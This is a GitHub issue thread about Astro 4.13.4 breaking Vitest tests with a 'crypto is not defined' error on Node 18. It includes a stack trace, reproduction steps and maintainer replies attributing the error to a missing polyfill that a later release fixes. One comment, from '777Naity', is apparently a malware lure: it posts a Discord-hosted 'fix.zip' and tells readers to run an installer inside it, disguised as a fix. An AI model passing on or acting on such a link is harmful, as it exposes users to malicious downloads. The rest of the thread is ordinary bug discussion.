### ISSUE TITLE
Vitest and AstroContainer throw error after 4.13.3

### ISSUE THREAD

**Issue by zanettin** [withastro/astro#11906]
### Astro Info

```block
Astro                    v4.13.4
Node                     v18.20.3
System                   Linux (x64)
Package Manager          unknown
Output                   static
Adapter                  none
Integrations             none
```

### Describe the Bug

The attached stackblitz example works till astro v`4.13.3`. When upgrading to `4.13.4` or higher, the vitest are throwing this error:

```
ReferenceError: crypto is not defined
 ❯ Module.createKey node_modules/astro/dist/core/encryption.js:5:15
      4|   const key = await crypto.subtle.generateKey(
      5|     {
      6|       name: ALGORITHM,
       |         ^
      7|       length: 256
      8|     },
 ❯ createManifest node_modules/astro/dist/container/index.js:48:32
 ❯ new experimental_AstroContainer node_modules/astro/dist/container/index.js:75:17
 ❯ experimental_AstroContainer.create node_modules/astro/dist/container/index.js:104:12
 ❯ eval src/components/Card.test.ts:9:23
 ❯ runTest node_modules/@vitest/runner/dist/index.js:995:11
 ❯ runSuite node_modules/@vitest/runner/dist/index.js:1151:15
 ❯ runSuite node_modules/@vitest/runner/dist/index.js:1151:15
 ❯ runFiles node_modules/@vitest/runner/dist/index.js:1208:5
 ```

# Reproduction Steps
- change `astro` version to `4.13.4` or higher (latest working version is `4.13.3`)
- run `npm install`
- run `npm test`

### What's the expected result?

The tests are working again and/or docs are updated 👼 

### Link to Minimal Reproducible Example

https://stackblitz.com/edit/github-dpyy1r?file=package.json

### Participation

- [ ] I am willing to submit a pull request for this issue.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by jsparkdev** [comment]
It works well locally under the same conditions.

Have you tried it locally?

In my case, it works successfully locally, and I get the same error as you on Stackblitz.

**Comment by Princesseuh** [comment]
This is because Node 18 doesn't have crypto globally available, Astro normally applies polyfill for this, but it seems like they failed to apply in this case.

**Comment by ascorbic** [comment]
Hey. If you upgrade to astro@latest this should now work in Node 18.
